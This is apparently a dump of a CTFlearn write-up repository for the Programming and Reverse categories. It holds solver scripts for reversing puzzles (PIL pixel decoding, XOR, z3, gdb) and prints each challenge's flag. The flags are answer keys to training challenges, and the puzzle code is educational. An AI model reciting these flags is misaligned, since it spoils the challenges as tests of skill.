++++++++++++++++++++++++++++++++++++++++++++++++.++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.++.----------->@>>.<@<<<.@<@<@<++++<.<@<@<<@<-----.<<<<<.<@<@<+<.+>@.-------.-------->>>.<@<@<++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.++>>>.<@<@<<.-----------<.>@>@<@><<.>@>@++++<.>@-----.>>>.<@<@<+<.>@+.-------.--------.+++++++++++++>>>>>>.<@<@<@<@<@<<.>@++.-------<.>@+++++++<<<.>@>@>@<<.>@>@<.>@-<.>@++++++++++++<<<.>@>@>@+++++++++++€ -------------------------------------------------------------------------------- /Programming/Read in Color/README.md: -------------------------------------------------------------------------------- 1 | ## Read in Color 2 | The main idea of finding the flag is using PIL library in Python. 3 | 4 | #### Step-1: 5 | We are given this file `color_img.png` which is a follows: 6 | 7 | 8 | 9 | #### Step-2: 10 | After reading the description of challenge, I wrote a script `exploit.py`, which helped me to get a flag. 11 | 12 | ```py 13 | from PIL import Image 14 | from collections import OrderedDict 15 | 16 | #Image Load 17 | file = Image.open("color_img.png") 18 | rgb_mode = file.convert("RGB") 19 | width, height = file.size 20 | 21 | myrgbvalue = [] 22 | 23 | for i in range(width): 24 | for j in range(height): 25 | rgbvalue = rgb_mode.getpixel((i,j)) 26 | myrgbvalue.append(rgbvalue) 27 | 28 | values = [] 29 | orderedvalues = list(OrderedDict.fromkeys(myrgbvalue)) 30 | word = "" 31 | 32 | for tup in orderedvalues: 33 | for value in tup: 34 | word += chr(value) 35 | print(word) 36 | ``` 37 | 38 | #### Step-3: 39 | Executing the script as `python3 exploit.py`, I got the flag. 40 | 41 | #### Step-4: 42 | Finally, the flag becomes: 43 | `flag{c0l0r_c0d3d}` 44 | -------------------------------------------------------------------------------- /Programming/Read in Color/color_img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Read in Color/color_img.png -------------------------------------------------------------------------------- /Programming/Read in Color/exploit.py: -------------------------------------------------------------------------------- 1 | from PIL import Image 2 | from collections import OrderedDict 3 | 4 | file = Image.open("color_img.png") 5 | rgb_mode = file.convert("RGB") 6 | width, height = file.size 7 | 8 | myrgbvalue = [] 9 | 10 | for i in range(width): 11 | for j in range(height): 12 | rgbvalue = rgb_mode.getpixel((i,j)) 13 | myrgbvalue.append(rgbvalue) 14 | 15 | values = [] 16 | orderedvalues = list(OrderedDict.fromkeys(myrgbvalue)) 17 | word = "" 18 | 19 | for tup in orderedvalues: 20 | for value in tup: 21 | word += chr(value) 22 | print(word) -------------------------------------------------------------------------------- /Programming/Simple Programming/Flag.py: -------------------------------------------------------------------------------- 1 | count = 0 2 | 3 | file = 'data.dat' 4 | 5 | with open(file) as f: 6 | l = f.readlines() 7 | for line in l: 8 | zero = line.count('0') 9 | one = line.count('1') 10 | '''the condition where the number of '0' is divisible by 3 11 | OR the number of '1' is divisible by 2''' 12 | if (zero%3 == 0) or (one%2 == 0): 13 | count = count + 1 14 | 15 | print("Number of lines: " + str(count)) 16 | f.close() 17 | -------------------------------------------------------------------------------- /Programming/Simple Programming/README.md: -------------------------------------------------------------------------------- 1 | ## Simple Programming 2 | The main idea finding the flag is some simple counting in a file. 3 | 4 | #### Step-1: 5 | After we download `data.dat` from the cloud, we understand that it is has 10,000 lines. So we definitely need to write up a script to get answer. 6 | 7 | #### Step-2: 8 | So I quickly drafted up `Flag.py` script to get number of such lines: 9 | 10 | ```py 11 | count = 0 12 | 13 | file = 'data.dat' 14 | 15 | with open(file) as f: 16 | l = f.readlines() 17 | for line in l: 18 | zero = line.count('0') 19 | one = line.count('1') 20 | if (zero%3 == 0) or (one%2 == 0): 21 | count = count + 1 22 | 23 | print("Number of lines: " + str(count)) 24 | f.close() 25 | ``` 26 | 27 | #### Step-3: 28 | When we execute this script by `python3 Flag.py`, we get the flag. 29 | 30 | Output: 31 | `Number of lines: 6662` 32 | 33 | #### Step-4: 34 | Finally the flag becomes: 35 | `CTFlearn{6662}` 36 | -------------------------------------------------------------------------------- /Programming/The Adventures of Boris Ivanov Part 2/Concatenate.py: -------------------------------------------------------------------------------- 1 | from PIL import Image 2 | 3 | listimages=[] 4 | for i in range(0,500): 5 | listimages.append(Image.open(str(i) + ".png")) # Make a list of pointers to the 500 pictures. 6 | 7 | concatenate=Image.new("RGB",(500,500)) # Size of the concatenate picture 8 | Y_offset=0 9 | 10 | for i in listimages: 11 | concatenate.paste(i,(0,Y_offset)) 12 | Y_offset+=1 # Add 1 at a time , Because the height of each picture is 1. 13 | concatenate.save("concatenate.png") 14 | -------------------------------------------------------------------------------- /Programming/The Adventures of Boris Ivanov Part 2/concatenate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/The Adventures of Boris Ivanov Part 2/concatenate.png -------------------------------------------------------------------------------- /Programming/The Adventures of Boris Ivanov Part 2/confetti.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/The Adventures of Boris Ivanov Part 2/confetti.zip -------------------------------------------------------------------------------- /Programming/Weird Android Calculator/README.md: -------------------------------------------------------------------------------- 1 | ## What could this be? 2 | The main idea finding the flag is knowing Programming in APK files. 3 | 4 | #### Step-1: 5 | 6 | I couldn't solve this challenge. So I had to look up for writeups, and this was very good. 7 | 8 | https://github.com/EladBeber/CTFlearn-Writeups/tree/master/Programming/Medium/Weird%20Android%20Calculator 9 | 10 | #### Step-5: 11 | 12 | Finally the flag becomes: 13 | `FLAG{APK_4nalys1s_1s_r4th3r_3asy_1snt_1t}` -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CTFlearn-Writeups 2 | 3 | CTFlearn writeups of all the challenges I have solved. It covers all the domains including Cryptography, Forensics, Reversing, Pwning and other misc problems. 4 | 5 | Link to CTF: [https://ctflearn.com/](https://ctflearn.com/) 6 | 7 | ## Challenges Category Wise 8 | 9 | ### 1. [Binary](./Binary/README.md) 10 | ### 2. [Cryptography](./Cryptography) 11 | ### 3. [Forensics](./Forensics) 12 | ### 4. [Miscellaneous](./Miscellaneous) 13 | ### 5. [Programming](./Programming) 14 | ### 6. [Reverse](./Reverse) 15 | ### 7. [Web](./Web) 16 | 17 | --- 18 | 19 |
20 | © Rishit Saiya, IIT Dharwad

21 | 22 | 23 |
24 |
25 |
26 | 27 |
28 | -------------------------------------------------------------------------------- /Reverse/Basic Android RE 1/BasicAndroidRE1.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Basic Android RE 1/BasicAndroidRE1.apk -------------------------------------------------------------------------------- /Reverse/Basic Android RE 1/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Basic Android RE 1/Flag.png -------------------------------------------------------------------------------- /Reverse/Bite-code/Bruteforce.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #pragma warning (disable : 4146) 4 | 5 | 6 | void BruteForce() 7 | { 8 | int flag , x1, x2, x3; 9 | flag = -2147483648; // The biggest negative value of 32bit. 10 | x3 = 0; 11 | while (x3 != -889275714) 12 | { 13 | x1 = flag << 3; 14 | x2 = flag ^ 525024598; 15 | x3 = x1 ^x2; 16 | flag += 1; 17 | } 18 | printf("%d \n", flag - 1); 19 | } 20 | 21 | 22 | void main() 23 | { 24 | BruteForce(); 25 | system("pause"); 26 | } 27 | -------------------------------------------------------------------------------- /Reverse/Bite-code/bitecode.txt: -------------------------------------------------------------------------------- 1 | public static boolean checkNum(int); 2 | descriptor: (I)Z 3 | flags: ACC_PUBLIC, ACC_STATIC 4 | Code: 5 | stack=2, locals=3, args_size=1 6 | 0: iload_0 7 | 1: iconst_3 8 | 2: ishl 9 | 3: istore_1 10 | 4: iload_0 11 | 5: ldc #2 // int 525024598 12 | 7: ixor 13 | 8: istore_2 14 | 9: iload_1 15 | 10: iload_2 16 | 11: ixor 17 | 12: ldc #3 // int -889275714 18 | 14: if_icmpne 21 19 | 17: iconst_1 20 | 18: goto 22 21 | 21: iconst_0 22 | 22: ireturn 23 | LineNumberTable: 24 | line 3: 0 25 | line 4: 4 26 | line 5: 9 27 | StackMapTable: number_of_entries = 2 28 | frame_type = 253 /* append */ 29 | offset_delta = 21 30 | locals = [ int, int ] 31 | frame_type = 64 /* same_locals_1_stack_item */ 32 | stack = [ int ] -------------------------------------------------------------------------------- /Reverse/Every Bit Counts/README.md: -------------------------------------------------------------------------------- 1 | ## Every Bit Counts 2 | The main idea to find the flag is reversing. 3 | 4 | #### Step-1: 5 | 6 | https://www.youtube.com/watch?v=BUhEKDmcGv0 7 | 8 | #### Step-2: 9 | Finally, the flag becomes: 10 | `CTFlearn{w0w_you_f0und_My_Fl@g_y0u_Ar3_so_much_n1c3}` -------------------------------------------------------------------------------- /Reverse/Every Bit Counts/every_bit_counts: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Every Bit Counts/every_bit_counts -------------------------------------------------------------------------------- /Reverse/Finish The Flag/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/Flag.png -------------------------------------------------------------------------------- /Reverse/Finish The Flag/exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/exec.png -------------------------------------------------------------------------------- /Reverse/Finish The Flag/exec.py: -------------------------------------------------------------------------------- 1 | import base64 2 | data = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAgIAECDQAAACMAgAAAAAAADQAIAACACgABgAFAAEAAAAAAAAAAIAECACABAjFAAAAxQAAAAUAAAAAEAAAAQAAAMgAAADIkAQIyJAECFcAAABXAAAABgAAAAAQAAAAAAAAAAAAAAAAAAC6CgAAALkUkQQIuwEAAAC4BAAAAM2AMcA8B3Qdi5DkkAQIQOkAAAAAVYnlUIDyF4hVAFhd6d////+7AAAAALgBAAAAzYAAAAA5w6nhu7PDvHtqbj09fSAgPFw6ICBfXyAgUDAARkVIYSQnagBRw7NBOGTDunAwbTk5cse5MDQwVjA1ZmYxTGxrOVwwb09cQy9cMDAAQ1RGbGVhcm57CgAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgAQIAAAAAAMAAQAAAAAAyJAECAAAAAADAAIAAQAAAAAAAAAAAAAABADx/wgAAADIkAQIAAAAAAAAAgAPAAAA5JAECAAAAAAAAAIAFQAAAOyQBAgAAAAAAAACAB0AAAAUkQQIAAAAAAAAAgAjAAAAmIAECAAAAAAAAAEAKAAAAKiABAgAAAAAAAABADUAAAC5gAQIAAAAAAAAAQA/AAAAgIAECAAAAAAQAAEAOgAAAB+RBAgAAAAAEAACAEYAAAAfkQQIAAAAABAAAgBNAAAAIJEECAAAAAAQAAIAAHFyLmFzbQByYW5kb20AZWZsYWcAcmFuZG9tMgBzZmxhZwBsb29wAGJpdGVfb2ZfZmxhZwBkb25lAF9fYnNzX3N0YXJ0AF9lZGF0YQBfZW5kAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC50ZXh0AC5kYXRhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAQAAAAYAAACAgAQIgAAAAEUAAAAAAAAAAAAAABAAAAAAAAAAIQAAAAEAAAADAAAAyJAECMgAAABXAAAAAAAAAAAAAAAEAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAgAQAA8AAAAAQAAAALAAAABAAAABAAAAAJAAAAAwAAAAAAAAAAAAAAEAIAAFIAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAGICAAAnAAAAAAAAAAAAAAABAAAAAAAAAA==" 3 | encodedBytes = base64.b64decode(data) 4 | execute_file = open("exec_bin", "wb") 5 | execute_file.write(encodedBytes) -------------------------------------------------------------------------------- /Reverse/Finish The Flag/exec_bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/exec_bin -------------------------------------------------------------------------------- /Reverse/Finish The Flag/exploit.py: -------------------------------------------------------------------------------- 1 | import gdb 2 | 3 | gdb.execute('break *0x80480af') 4 | gdb.execute('run') 5 | 6 | flag = '' 7 | for i in range(7): 8 | dl = gdb.parse_and_eval('$dl') 9 | flag += chr(dl) 10 | 11 | gdb.execute('continue') 12 | 13 | print("CTFlearn{" + flag) 14 | -------------------------------------------------------------------------------- /Reverse/Finish The Flag/finish_the_flag/qr.asm.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/finish_the_flag/qr.asm.enc -------------------------------------------------------------------------------- /Reverse/Finish The Flag/finish_the_flag/qr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/finish_the_flag/qr.png -------------------------------------------------------------------------------- /Reverse/Finish The Flag/finish_the_flag/readme.txt: -------------------------------------------------------------------------------- 1 | Once you have obtained the flag, you can read the source with: 2 | openssl enc -d -aes-256-cbc -pbkdf2 -k FLAG -in qr.asm.enc -out qr.asm 3 | -------------------------------------------------------------------------------- /Reverse/Finish The Flag/letter.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/letter.zip -------------------------------------------------------------------------------- /Reverse/Finish The Flag/objdump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/objdump.png -------------------------------------------------------------------------------- /Reverse/Finish The Flag/qr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/qr.png -------------------------------------------------------------------------------- /Reverse/Jumper/flag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Jumper/flag -------------------------------------------------------------------------------- /Reverse/Jumper/flag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(void) { 4 | char s[4] = "jum"; 5 | int* tmp = (int*)s; 6 | 7 | for (int i = 0; i <= 7; i++) { 8 | *tmp += 5; 9 | } 10 | 11 | printf("Address: 0x%08X\n", *tmp); 12 | 13 | return 0; 14 | } -------------------------------------------------------------------------------- /Reverse/Lost In The Binary/Crack.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | 3 | a = Int('a') # qword_602148 4 | b = Int('b') # qword_602150 5 | c = Int('c') # qword_602158 6 | d = Int('d') # qword_602160 7 | 8 | s = Solver() 9 | s.add(-24 * a + (-18 * b) + (-15 * c) + (-12 * d) == -18393) 10 | s.add(9 * c + 18 * (b + a) + -9 * d == 4419) 11 | s.add( 4 * c + 16 * a + 12 * b + 2 * d == 7300) 12 | s.add(-6 * (b + a) + -3 * c+ -11 * d == -8613) 13 | print(s.check()) 14 | print(s.model()) -------------------------------------------------------------------------------- /Reverse/Lost In The Binary/README.md: -------------------------------------------------------------------------------- 1 | https://github.com/EladBeber/CTFlearn-Writeups/tree/master/Reverse%20Engineering/Hard/Lost%20In%20The%20Binary 2 | -------------------------------------------------------------------------------- /Reverse/Lost In The Binary/lost_in_bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Lost In The Binary/lost_in_bin -------------------------------------------------------------------------------- /Reverse/PIN/README.md: -------------------------------------------------------------------------------- 1 | ## PIN 2 | The main idea finding the flag by IDA. 3 | 4 | 5 | #### Step-1: 6 | After we get the link: 7 | [https://mega.nz/#!PXYjCKCY!F2gcs83XD6RxjOR-FNWGQZpyvUFvDbuT-PTnqRhBPGQ](https://mega.nz/#!PXYjCKCY!F2gcs83XD6RxjOR-FNWGQZpyvUFvDbuT-PTnqRhBPGQ), we get the the binary file `rev1` 8 | 9 | #### Step-2: 10 | Follow this: 11 | 12 | https://github.com/EladBeber/CTFlearn-Writeups/tree/master/Reverse%20Engineering/Medium/PIN 13 | 14 | #### Step-3: 15 | Finally the flag becomes: 16 | `CTFlearn{333333}` 17 | -------------------------------------------------------------------------------- /Reverse/PIN/rev1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/PIN/rev1 -------------------------------------------------------------------------------- /Reverse/PIN/rev1.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/PIN/rev1.i64 -------------------------------------------------------------------------------- /Reverse/PyDis/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/PyDis/Flag.png -------------------------------------------------------------------------------- /Reverse/PyDis/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | def cipherOperation(c1, c2): 4 | return ord(c1)^c2 5 | 6 | output = 'éÿîÅËÎÞÃÙóÙÕÎÈÊúèÞÎÜÌÌÕÓÕìùÂéçÆÐþÿñÖËîÿôÿ' 7 | decodedDecArray = [] 8 | for i in range(len(output)): 9 | a = cipherOperation(output[i], i) 10 | a ^= 170 11 | decodedDecArray.append(a) 12 | 13 | print("Flag: " + ''.join(map(chr, decodedDecArray))) -------------------------------------------------------------------------------- /Reverse/RE_verseDIS/problem: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/RE_verseDIS/problem -------------------------------------------------------------------------------- /Reverse/Ramada/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Ramada/Flag.png -------------------------------------------------------------------------------- /Reverse/Ramada/Ramada: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Ramada/Ramada -------------------------------------------------------------------------------- /Reverse/Ramada/Ramada.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Ramada/Ramada.zip -------------------------------------------------------------------------------- /Reverse/Ramada/exploit.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | 3 | data = [0x13693, 0x6b2c0, 0x11a9f9, 0x157000, 0x1cb91, 0x1bb528, 0x1bb528, 0xded21, 0x144f38, 0xfb89d, 0x169b48, 0xd151f, 0x8b98b, 0x17d140, 0xded21, 0x1338c0, 0x1338c0, 0x11a9f9, 0x1b000, 0x144f38, 0x1734eb] 4 | 5 | flag = "" 6 | 7 | for d in data: 8 | i = round(np.cbrt(d)) 9 | flag += chr(i) 10 | 11 | print("Flag: CTFlearn{" + flag + "}") -------------------------------------------------------------------------------- /Reverse/Ramada/sources.zip.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Ramada/sources.zip.enc -------------------------------------------------------------------------------- /Reverse/Rangoon/Rangoon: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rangoon/Rangoon -------------------------------------------------------------------------------- /Reverse/Rangoon/Rangoon.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rangoon/Rangoon.zip -------------------------------------------------------------------------------- /Reverse/Rangoon/readme: -------------------------------------------------------------------------------- 1 | This problem is a simple introduction to reversing. 2 | 3 | If you have no experience with reversing but know a little of C/C++ 4 | these two YouTube videos from LiveOverflow will give you a 5 | basic introduction to Reversing to help solve this challenge. 6 | 7 | https://www.youtube.com/watch?v=VroEiMOJPm8 8 | https://www.youtube.com/watch?v=3NTXFUxcKPc 9 | 10 | If you are new to reversing my Reykjavik and Riyadh problems are 11 | little easier than this one and you probably want to solve those 12 | challenges first (after watching the above two videos :-) ). 13 | 14 | If you go to the work of solving my Reversing Challenge, I'd like for you to 15 | be able to see the sources if you are interested. 16 | 17 | I have encrytped the zipped sources using the challenge flag as the 18 | password to decrypt the sources. Solve the challenge, get the flag, 19 | decrypt the sources. 20 | 21 | openssl enc -d -aes-256-cbc -pbkdf2 -k flag -out sources.zip -in sources.zip.enc 22 | 23 | Please don't share the flag with anyone else or share the sources used to 24 | create the challenge or use this source to create your own challenge. Please. 25 | 26 | I am on Twitter and Discord as @kcbowhunter. But I can't teach you Assembler or 27 | Reversing, you have to learn that yourself. There are lots of good videos available 28 | on YouTube, LiveOverflow is an excellent place to start. Good Luck! 29 | 30 | -------------------------------------------------------------------------------- /Reverse/Rangoon/sources.zip.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rangoon/sources.zip.enc -------------------------------------------------------------------------------- /Reverse/Raspberry/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Raspberry/Flag.png -------------------------------------------------------------------------------- /Reverse/Raspberry/Raspberry: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Raspberry/Raspberry -------------------------------------------------------------------------------- /Reverse/Raspberry/Raspberry.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Raspberry/Raspberry.zip -------------------------------------------------------------------------------- /Reverse/Raspberry/exploit.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import string 3 | 4 | output_len = 156 5 | flag = '' 6 | 7 | for i in range(19): 8 | for c in string.printable: 9 | out, _ = subprocess.Popen( 10 | ['./Raspberry', (flag+c).ljust(19, string.printable[-1])], stdout = subprocess.PIPE).communicate() 11 | if len(out) != output_len: 12 | output_len = len(out) 13 | flag += c 14 | break 15 | print("Flag: " + flag) -------------------------------------------------------------------------------- /Reverse/Raspberry/sources.zip.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Raspberry/sources.zip.enc -------------------------------------------------------------------------------- /Reverse/Recklinghausen/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Recklinghausen/Flag.png -------------------------------------------------------------------------------- /Reverse/Recklinghausen/Recklinghausen: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Recklinghausen/Recklinghausen -------------------------------------------------------------------------------- /Reverse/Recklinghausen/Recklinghausen.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Recklinghausen/Recklinghausen.zip -------------------------------------------------------------------------------- /Reverse/Recklinghausen/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | def bytes_to_array(dat, sz): 4 | dat = dat.split() 5 | arr = [] 6 | for i in range(0, len(dat), sz): 7 | arr.append(int(''.join(reversed(dat[i:i+sz])), 16)) 8 | return arr 9 | 10 | msg5 = "21 7e 3d 2a 38 12 1b 1f 0c 10 05 2c 0b 16 0c 18 1b 0d 0a 0d 0e 17 1b 12 1b 21 38 1b 0d 0a 17 08 1f 12 03" 11 | msg5 = bytes_to_array(msg5, 1) 12 | 13 | def uncheck(): 14 | buf = [0]*msg5[0] 15 | 16 | if msg5[0] != 0: 17 | for i in range(msg5[0]): 18 | buf[i] = msg5[i+2] ^ msg5[1] 19 | return buf 20 | 21 | buf = uncheck() 22 | flag = ''.join(map(chr, buf)) 23 | print("Flag: " + flag) 24 | -------------------------------------------------------------------------------- /Reverse/Recklinghausen/sources.zip.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Recklinghausen/sources.zip.enc -------------------------------------------------------------------------------- /Reverse/Reverse Me/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Reverse Me/Flag.png -------------------------------------------------------------------------------- /Reverse/Reverse Me/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | expected = [0] * 26 4 | expected[0] = ord('W') 5 | expected[1] = 0x42 6 | expected[2] = 0x4b 7 | expected[3] = 0x45 8 | expected[4] = 0xcc 9 | expected[5] = 0xbb 10 | expected[6] = 0x81 11 | expected[7] = 0xcc 12 | expected[8] = 0x71 13 | expected[9] = 0x7a 14 | expected[10] = 0x71 15 | expected[11] = 0x66 16 | expected[12] = 0xdf 17 | expected[13] = 0xbb 18 | expected[14] = 0x86 19 | expected[15] = 0xcd 20 | expected[16] = 100 21 | expected[17] = 0x6f 22 | expected[18] = 0x6e 23 | expected[19] = 0x5c 24 | expected[20] = 0xf2 25 | expected[21] = 0xad 26 | expected[22] = 0x9a 27 | expected[23] = 0xd8 28 | expected[24] = 0x7e 29 | expected[25] = 0x6f 30 | 31 | def unshuffle(param): 32 | buf = [0] * len(param) 33 | 34 | for i in range(0, len(param)-1, 2): 35 | buf[i+1] = param[i] 36 | 37 | for i in range(1, len(param), 2): 38 | buf[i-1] = param[i] 39 | 40 | return buf 41 | 42 | def decrypt(block): 43 | local_48 = [1, 3, 3, 7, 0xde, 0xad, 0xbe, 0xef] 44 | buf = [0] * len(block) 45 | ind = 0 46 | 47 | for i in range(len(block)): 48 | buf[i] = block[i] ^ local_48[ind] 49 | ind = (ind+1) % len(local_48) 50 | return buf 51 | 52 | buf = unshuffle(expected) 53 | buf = decrypt(buf) 54 | flag = ''.join(map(chr, buf)) 55 | 56 | print("Flag: " + flag) -------------------------------------------------------------------------------- /Reverse/Reverse Me/reverseme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Reverse Me/reverseme -------------------------------------------------------------------------------- /Reverse/Reykjavik/README.md: -------------------------------------------------------------------------------- 1 | ## Reykjavik 2 | The main idea to find the flag is to use GDB to navigate across instructions. 3 | 4 | #### Step-1: 5 | Using `gdb -q Rejkjavik`, we get can hop on to the `main` function using break points. The command for the same would be `b * main`. After reaching, using `ni` Next Instriction, we land up to the flag as mentioned below. 6 | 7 | #### Step-2: 8 | Finally, the flag becomes: 9 | `CTFlearn{Eye_L0ve_Iceland_U}` -------------------------------------------------------------------------------- /Reverse/Reykjavik/Reykjavik: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Reykjavik/Reykjavik -------------------------------------------------------------------------------- /Reverse/Reykjavik/Reykjavik.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Reykjavik/Reykjavik.zip -------------------------------------------------------------------------------- /Reverse/Rotterdam Reversing Challenge/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rotterdam Reversing Challenge/Flag.png -------------------------------------------------------------------------------- /Reverse/Rotterdam Reversing Challenge/Rotterdam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rotterdam Reversing Challenge/Rotterdam -------------------------------------------------------------------------------- 